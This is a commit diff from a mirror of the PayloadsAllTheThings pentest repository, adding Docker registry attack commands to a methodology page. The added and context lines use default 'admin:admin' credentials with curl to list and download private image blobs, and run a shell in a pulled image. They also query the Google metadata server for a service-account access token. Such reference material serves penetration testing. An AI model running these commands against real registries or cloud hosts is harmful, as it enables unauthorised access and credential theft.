Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-20 14:32:04 +00:00
Code Issues Projects Releases Packages Wiki Activity

Docker Registry - Pull/Download

Browse source
This commit is contained in:
Swissky 2020-04-04 18:27:41 +02:00
parent f748af16d2
commit 6e7af5a267
1 changed files with 18 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
Methodology and Resources/Container - Docker Pentest.md
View file

@ -70,6 +70,24 @@ Docker Registrys fingerprint is `Docker-Distribution-Api-Version` header. The
```powershell
curl https://registry.example.com/v2/<image_name>/tags/list
docker pull https://registry.example.com:443/<image_name>:<tag>
# connect to the endpoint and list image blobs
curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog
curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list
curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest
# download blobs
curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz
# automated download
https://github.com/NotSoSecure/docker_fetch/
python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local
```
Access a private registry and start a container with one of its image
```powershell
docker login -u admin -p admin docker.registry.local
docker pull docker.registry.local/wordpress-image
docker run -it docker.registry.local/wordpress-image /bin/bash
```
Access a private registry using OAuth Token from Google
@ -80,7 +98,6 @@ curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service
docker login -e <email> -u oauth2accesstoken -p "<access token>" https://gcr.io
```
## Exploit privileged container abusing the Linux cgroup v1
Prerequisite (at least one):